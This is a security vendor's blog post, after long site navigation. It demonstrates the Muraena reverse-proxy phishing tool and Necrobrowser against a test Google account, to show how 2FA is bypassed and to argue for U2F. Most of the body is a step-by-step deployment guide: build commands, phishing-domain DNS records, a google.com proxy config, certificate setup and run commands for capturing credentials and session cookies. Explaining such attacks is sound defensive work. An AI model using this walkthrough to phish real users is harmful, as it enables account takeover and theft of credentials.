WEBINAR | A Deep-Dive into 2023 Cyber Threats
Reduce Alert Noise and False Positives
Boost your team's productivity by cutting down alert noise and false positives.
Automate Security Operations
Boost efficiency, reduce burnout, and better manage risk through automation.
Dark Web Monitoring
Online protection tuned to the need of your business.
Maximize Existing Security Investments
Improve efficiencies from existing investments in security tools.
Beyond MDR
Move your security operations beyond the limitations of MDR.
Secure with Microsoft 365 E5
Boost the power of Microsoft 365 E5 security.
Secure Multi-Cloud Environments
Improve cloud security and overcome complexity across multi-cloud environments.
Secure Mergers and Acquisitions
Control cyber risk for business acquisitions and dispersed business units.
Operational Technology
Solve security operations challenges affecting critical operational technology (OT) infrastructure.
Force-Multiply Your Security Operations
Whether you’re just starting your security journey, need to up your game, or you’re not happy with an existing service, we can help you to achieve your security goals.
Detection Investigation Response
Modernize Detection, Investigation, Response with a Security Operations Platform.
Threat Hunting
Locate and eliminate lurking threats with ReliaQuest GreyMatter
Threat Intelligence
Find cyber threats that have evaded your defenses.
Model Index
Security metrics to manage and improve security operations.
Breach and Attack Simulation
GreyMatter Verify is ReliaQuest’s automated breach and attack simulation capability.
Digital Risk Protection
Continuous monitoring of open, deep, and dark web sources to identify threats.
Phishing Analyzer
GreyMatter Phishing Analyzer removes the abuse mailbox management by automating the DIR process for you.
Integration Partners
The GreyMatter cloud-native Open XDR platform integrates with a fast-growing number of market-leading technologies.
Unify and Optimize Your Security Operations
ReliaQuest GreyMatter is a security operations platform built on an open XDR architecture and designed to help security teams increase visibility, reduce complexity, and manage risk across their security tools, including on-premises, clouds, networks, and endpoints.
Blog
Company Blog
Case Studies
Brands of the world trust ReliaQuest to achieve their security goals.
Data Sheets
Learn how to achieve your security outcomes faster with ReliaQuest GreyMatter.
eBooks
The latest security trends and perspectives to help inform your security operations.
Industry Guides and Reports
The latest security research and industry reports.
Podcasts
Catch up on the latest cybersecurity podcasts, and mindset moments from our very own mental performance coaches.
Solution Briefs
A deep dive on how ReliaQuest GreyMatter addresses security challenges.
White Papers
The latest white papers focused on security operations strategy, technology & insight.
Videos
Current and future SOC trends presented by our security experts.
Events & Webinars
Explore all upcoming company events, in-person and on-demand webinars
ReliaQuest ResourceCenter
From prevention techniques to emerging security trends, our comprehensive library can arm you with the tools you need to improve your security posture.
Threat Research
Get the latest threat analysis from the ReliaQuest Threat Research Team. ReliaQuest ShadowTalk Weekly podcast featuring discussions on the latest cybersecurity news and threat research.
Shadow Talk
ReliaQuest's ShadowTalk is a weekly podcast featuring discussions on the latest cybersecurity news and threat research. ShadowTalk's hosts come from threat intelligence, threat hunting, security research, and leadership backgrounds providing practical perspectives on the week's top cybersecurity stories.
April 18, 2024
About ReliaQuest
We bring our best attitude, energy and effort to everything we do, every day, to make security possible.
Leadership
Security is a team sport.
No Show Dogs Podcast
Mental Performance Coaches Derin McMains and Dr. Nicole Detling interview world-class performers across multiple industries.
Make It Possible
Make It Possible reflects our focus on bringing cybersecurity awareness to our communities and enabling the next generation of cybersecurity professionals.
Careers
Join our world-class team.
Press and Media Coverage
ReliaQuest newsroom covering the latest press release and media coverage.
Become a Channel Partner
When you partner with ReliaQuest, you help deliver world-class cybersecurity solutions.
Contact Us
How can we help you?
A Mindset Like No Other in the Industry
Many companies tout their cultures; at ReliaQuest, we share a mindset. We focus on four values every day to make security possible: being accountable, helpful, adaptable, and focused. These values drive development of our platform, relationships with our customers and partners, and further the ReliaQuest promise of security confidence across our customers and our own teams.
More results...
Phishing remains one of the most pervasive threats to enterprise, the simple but effective technique of tricking unassuming users into divulging sensitive information such as usernames and passwords has remained incredibly successful. This is often achieved by redirecting a user to a site which impersonates a legitimate service and captures the victim’s credentials when entered, these credentials can then be reused by the attacker to achieve their desired goal.
Two-factor Authentication (2FA) was once a hurdle for this type of attack, but techniques to bypass many types of 2FA solutions were quickly adopted and implemented into a variety of phishing frameworks. It is important to understand how these bypasses work so defenders can push for standards, such as U2F, which remain resilient against these bypasses.
On 15 May 2019 the Muraena Team released Muraena and Necrobrowser. Initially teased in their talk at HITB2019AMS, the Muraena / Necrobrowser tools aim to automate the phishing of credentials, 2FA tokens, and subsequent post-phishing activities. This is achieved by Muraena acting as a transparent reverse proxy solution which captures credentials and session cookies. These valid sessions are handed off to Necrobrowser, which uses the gathered sessions to impersonate the victim. Necrobrowser instruments a set of Dockerized Chrome browsers to keep alive the stolen sessions, automate the extraction of data and perform other actions on the attacker’s behalf. You can check out the slides for more information.
We configured Muraena to phish credentials from a test Google account, and used the existing Necrobrowser functionality to automate the mining of the target’s Gmail inbox using capabilities built into Necrobrowser. This can be seen in the video below:
As demonstrated in the video, because Muraena uses a reverse proxy to intercept traffic from the user to the target website, the user experience is virtually indistinguishable from the user navigating directly to the website itself (apart from the domain). This is in stark contrast to the phishing platforms of old, which often rely on serving prebaked templates which often break dynamic website content.
The Muraena and Necrobrowser projects can be found: https://github.com/muraenateam
Both Muraena and Necrobrowser are implemented using Golang, which can be installed here.
Once installed, you can compile Muraena using the following:
go get github.com/muraenateam/muraena
cd $GOPATH/src/github.com/muraenateam/muraena
make build
Your DNS will need to be configured with a wildcard CNAME and an A record pointed at the location of your Muraena proxy. For ours this looks like:
*.redvsblue.team. 1 IN CNAME redvsblue.team.
redvsblue.team. 1 IN A MURAENA_IP_ADDR
You will need to modify the config file for Muraena, so go ahead and change the beginning of the config file to look like below. In this example we will be using the preconfigured config/google.com.json file.
{
"proxy": {
"phishing": "redvsblue.team",
"destination": "google.com",
"skipContentType": [
"font/*",
"image/*"
],
...
If you wish to use a Let’s Encrypt wildcard certificate, you can follow the following steps:
wget https://dl.eff.org/certbot-auto
sudo mv certbot-auto /usr/local/bin/certbot-auto
sudo chown root /usr/local/bin/certbot-auto
chmod 0755 /usr/local/bin/certbot-auto
sudo chmod 0755 /usr/local/bin/certbot-auto
certbot-auto certonly --server https://acme-v02.api.letsencrypt.org/directory --manual --preferred-challenges dns -d '*.redvsblue.team'
Then follow the prompts to validate domain ownership. This will require you to add a TXT record to your DNS config.
Once generated, your certificate will be generated and added to the following folder:
/etc/letsencrypt/live/redvsblue.team/
You will be required to update your Muraena config you are hoping to use. The TLS section should look something like:
"tls": {
"enabled": true,
"expand": false,
"certificate": "/etc/letsencrypt/live/redvsblue.team/cert.pem",
"key": "/etc/letsencrypt/live/redvsblue.team/privkey.pem",
"root": "/etc/letsencrypt/live/redvsblue.team/fullchain.pem",
}
Run it by specifying your config file:
sudo ./muraena --config config/google.com.json
Once this is executed you should see the following
If all went well, you should now be able to navigate to your domain and your traffic will proxied through Muraena. This will allow you to capture credentials and session data, but the real magic comes into play when you configure Necrobrowser, which automates the post phishing activities for you and persist collected sessions.
Necrobrowser uses Docker to execute the Chrome browsers used for the automation of the post exploitation task. So, let’s begin by installing Docker for your platform using the instructions found here: https://docs.docker.com/install/
Compile Necrobrowser using Go:
go get github.com/muraenateam/necrobrowser
cd $GOPATH/src/github.com/muraenateam/necrobrowser
If you’re running Necrobrowser on the same machine as Muraena you can run this the following command, you will need to substitute the token from your Muraena config:
sudo ./necrobrowser --token "ada9f7b8-6e6c-4884-b2a3-ea757c1eb617"
If successful you should see the following:
With both Muraena and Necrobrowser running, once Muraena captures a valid session it will be passed to Necrobrowser, which will perform its predefined post-exploitation activities.
Once completed, the session is persisted within the Dockerized Chrome browser. The attacker can interact with this browser and ride the active session to have full access to the victim account.
2FA is often hailed as the ultimate solution to prevent phishing, but not all 2FA solutions are infallible. Muraena can bypass a variety of 2FA solutions including SMS, Push, Software Authenticators, OTP and more. Thankfully, U2F provides some respite from attacks of this nature as user logins are bound to the origin, so only the real site can authenticate with the U2F token. Widespread adoption of U2F is unfortunately still lacking, but hopefully tools such as Muraena will help to expedite the process.
We will be discussing the nuances of different 2FA solutions in more depth in our upcoming 2FA Strategic Review paper, so stay tuned.